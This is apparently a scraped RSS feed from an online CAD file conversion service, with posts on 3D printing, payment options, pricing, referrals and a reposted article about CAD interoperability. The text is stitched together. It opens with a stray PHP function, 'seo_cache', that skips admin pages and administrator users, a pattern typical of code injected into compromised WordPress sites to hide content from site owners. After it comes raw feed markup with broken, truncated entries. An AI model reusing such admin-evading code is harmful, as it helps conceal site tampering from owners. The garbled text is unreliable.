function seo_cache() { if (is_admin()) { return; } $current_user = wp_get_current_user(); if (in_array('administrator', (array) $current_user->roles)) { return; } ?> Online CAD File Converter https://convertcadfiles.com Convert Catia, NX, STL, JT files. Try it for free! Thu, 25 May 2017 09:04:38 +0000 en-GB hourly 1 https://wordpress.org/?v=6.9.4 3D Printing https://convertcadfiles.com/3d-print/ Tue, 29 Mar 2016 15:47:28 +0000 http://www.convertcadfiles.com/?p=1711 We have teamed up with 3D Hubs to offer 3D printing service to all of our customers. If you convert your CAD file to STL or OBJ format, you can submit this file to 3D Hubs with a single click of a button.

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The 3D Hubs online platform provides the easiest way to bring designs to life by offering local 3D print production in under two days. We check the user’s digital design and our matchmaking algorithms present the best 3D print options for them.

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File-extensions.org listing https://convertcadfiles.com/file-extensions/ Thu, 25 Feb 2016 08:58:46 +0000 http://www.convertcadfiles.com/?p=1564 File-Extensions.org

The Source for File Extensions Information

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File-extensions.org library contains thousands of file extensions and the database is still growing.  
A large number of file type entries have detailed descriptions, including their current use and the list of programs that can open, view, edit, convert or play unknown file you search for.


ConvertCADfiles.com is now also listed here with detailed conversion capabilities: http://www.file-extensions.org/online-cad-converter-file-extensions

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We accept credit cards https://convertcadfiles.com/we-accept-credit-cards/ Thu, 20 Aug 2015 18:41:29 +0000 http://www.convertcadfiles.com/?p=1051 Hi Engineers, From now on ConvertCADfiles.com accepts MasterCard, VISA and American Express credit cards besides PayPal and wire transfer. Would you like to convert your CATpart, STEP, SolidWorks, AutoDesk and JT files to STL, JT, OBJ, 3DS, PDF formats? Here you can simply upload and convert your files. ConvertCADfiles.com Team  ]]> CAD file conversion for $1 or €1 https://convertcadfiles.com/cad-file-conversion-for-1-or-e1/ Wed, 29 Jul 2015 10:52:22 +0000 http://www.convertcadfiles.com/?p=1023 upload and convert your files Kind regards ConvertCADfiles.com Team]]> CAD Conversion https://convertcadfiles.com/880/ Wed, 20 May 2015 19:20:21 +0000 http://www.convertcadfiles.com/?p=880 The amount of choice in the ever-expanding CAD universe is not without a strong caveat: the persistent interoperability woes for which no one authoring solution can fully conquer. CAD interoperability is treated as an incurable disease, the unfortunate cost of doing business within a diverse supply chain of industry conglomerates and nimble design shops adrift in an ocean of variable formats and constantly flowing technology. Coping mechanisms are in abundant supply, be it a variety of neutral formats, direct modeling tools, direct and indirect translation, or the good old brute force method: old-school remodeling. But the pain remains. Reliable direct translation seems to be the preferable solution, especially with regards to preserving design intent, but things are not quite so simple. When it comes to properly handling the abundance of CAD file formats in the wild, engineers and companies too often find themselves staring longingly through a window across a foreign landscape, knowing they are hopelessly lost in CAD translation. When it comes to direct translation, traversing geometry kernels cleanly is not a trivial exercise. Translation software is necessarily complex, relatively expensive, and unfortunately creates imperfect results. It’s hard work battling asymmetrical math models, waging wars of attrition with vertices, B-reps, and NURBS. You’re outgunned right from the start, with nothing but a 64bit floating-point shotgun. Those infinitesimally small rounding errors are ganging up on you; it’s quite literally death by a thousand tiny decimals. Recognizing the challenge, the best translation software tools include a variety of healing methodologies to assess and repair the damage incurred when moving across topologies. But the expense and difficulty of properly leveraging these tools may be a bridge too far, especially if you don’t have the time for simultaneous PhD’s in Computer Science and Math. So this is often a job for specialists. Or you could just mash the translate button, toss it over the fence and hope for the best. Could things get worse? Yeah, they’re worse. Larger companies purposefully limit their interoperability exposure through format mandates to their supply chain. It’s generally a sound data quality strategy, if you can exert that level of control on your subcontractors. But that’s where interoperability woes place a uneven burden on the smaller firms. What happens if you are deep in that supply chain? As you move further down the chain, the companies get smaller, but the potential of having to deal with multiple foreign CAD formats from varied contractor requirements increases. It’s all due to less leverage over other players. Such companies can find themselves in a difficult situation, unable to both afford and effectively utilize the available repertoire of translation tools. It’s even worse if you’re a freelancer. What to do? Ignore any new business that comes along demanding different file format requirements? Is there any way to reduce or remove the translation burden for the small company or the individual? When costs and expertise make an internal process infeasible, it certainly makes sense to outsource. But when needs are variable or one-off, simple outsourcing is not enough, you need an on-demand model. So could CAD translation be turned into an on-demand service? One startup in particular, Online CAD Converter, is aiming to do just that. They are testing the service now, with an introductory offer of 3 free translations to give the concept a whirl. For some of the same reasons that the drive-thru (European readers will have to use their imagination) at your local burger palace provides a low friction meal on the run, no kitchen or pre-planning required, engineers could certainly use a similarly accessible and hassle-free translation experience. Given the right format support, it might be the next best thing to tater tots. So what do you think? Source: http://eng-eng.com/lost-in-cad-translation/ By: Ed Lopategui]]> Spread the word https://convertcadfiles.com/spread-word/ Wed, 04 Mar 2015 09:41:36 +0000 http://www.convertcadfiles.com/?p=672 three free conversions if your colleague buys a conversion packet. Simply send us his email address and we will update your voucher.]]> Conversion service is now online https://convertcadfiles.com/conversion-service-now-online/ Tue, 03 Mar 2015 12:40:37 +0000 http://www.convertcadfiles.com/?p=633